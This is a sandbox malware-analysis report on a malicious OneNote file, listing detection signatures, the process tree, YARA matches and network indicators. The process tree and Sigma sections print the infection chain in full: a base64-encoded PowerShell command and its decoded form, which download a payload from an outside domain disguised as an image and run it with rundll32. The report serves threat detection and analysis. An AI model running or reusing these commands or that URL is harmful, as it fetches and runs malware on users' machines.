Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Original.one

Overview

General Information

Sample Name:Original.one
Analysis ID:800789
MD5:f727e5b082e13d521668e2908b3b7607
SHA1:4eb0f8309b33e7f79cfa2d37523690dbe1ad0c97
SHA256:8529b2ec8ed9d701904b8e2560cb3f12d049fedecb588102b5baf6d7a4c7830a
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Execute DLL with spoofed extension
Malicious sample detected (through community Yara rule)
Document exploit detected (process start blacklist hit)
Suspicious powershell command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Creates a start menu entry (Start Menu\Programs\Startup)
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w10x64
  • ONENOTE.EXE (PID: 2956 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Original.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • ONENOTEM.EXE (PID: 5592 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • cmd.exe (PID: 6096 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2104 cmdline: powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) MD5: 95000560239032BC68B4C2FDFCDEF913)
    • cmd.exe (PID: 1404 cmdline: C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 3924 cmdline: powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg MD5: 95000560239032BC68B4C2FDFCDEF913)
      • rundll32.exe (PID: 5564 cmdline: rundll32 C:\programdata\putty.jpg,Wind MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2104INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x63c:$b2: ::FromBase64String(
  • 0x21e2:$b2: ::FromBase64String(
  • 0x15e53:$b2: ::FromBase64String(
  • 0x15f8f:$b2: ::FromBase64String(
  • 0x162a6:$b2: ::FromBase64String(
  • 0x6f5fc:$b2: ::FromBase64String(
  • 0x6f7ad:$b2: ::FromBase64String(
  • 0x860ff:$b2: ::FromBase64String(
  • 0x86220:$b2: ::FromBase64String(
  • 0x86351:$b2: ::FromBase64String(
  • 0x87e4b:$b2: ::FromBase64String(
  • 0x87f85:$b2: ::FromBase64String(
  • 0xa6969:$b2: ::FromBase64String(
  • 0xa9a0d:$b2: ::FromBase64String(
  • 0xb2adc:$b2: ::FromBase64String(
  • 0xb313e:$b2: ::FromBase64String(
  • 0xb75ad:$b2: ::FromBase64String(
  • 0xdb588:$b2: ::FromBase64String(
  • 0xdb6c3:$b2: ::FromBase64String(
  • 0xdb9e4:$b2: ::FromBase64String(
  • 0xdbcbb:$b2: ::FromBase64String(

Sigma Signatures

Data Obfuscation

barindex
Sigma detected: Execute DLL with spoofed extension
Source: Process startedAuthor: Joe Security: Data: Command: rundll32 C:\programdata\putty.jpg,Wind, CommandLine: rundll32 C:\programdata\putty.jpg,Wind, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1404, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32 C:\programdata\putty.jpg,Wind, ProcessId: 5564, ProcessName: rundll32.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 109.203.123.62:443 -> 192.168.2.3:49704 version: TLS 1.0

Software Vulnerabilities

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
Source: global trafficHTTP traffic detected: GET /CCoN/01.gif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: nerulgymkhana.comConnection: Keep-Alive
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknownHTTPS traffic detected: 109.203.123.62:443 -> 192.168.2.3:49704 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: powershell.exe, 00000003.00000002.274034149.0000027D4FF53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000003.00000002.274530600.0000027D500B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.aadrm.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.aadrm.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.cortana.ai
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.office.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.onedrive.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://api.scheduler.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://augloop.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://augloop.office.com/v2
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://cdn.entity.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://clients.config.office.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://config.edge.skype.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://cortana.ai
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://cortana.ai/api
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://cr.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://d.docs.live.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://dev.cortana.ai
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://devnull.onenote.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://directory.services.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://graph.windows.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://graph.windows.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://invites.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://lifecycle.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://login.windows.local
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://make.powerautomate.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://management.azure.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://management.azure.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://messaging.action.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://messaging.engagement.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://messaging.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://ncus.contentsync.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000003.00000002.274530600.0000027D50643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.274530600.0000027D50566000.00000004.00000800.00020000.00000000.sdmp, in.cmd.1.drString found in binary or memory: https://nerulgymkhana.com/CCoN/01.gif
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://officeapps.live.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://onedrive.live.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://outlook.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://outlook.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://outlook.office365.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://outlook.office365.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
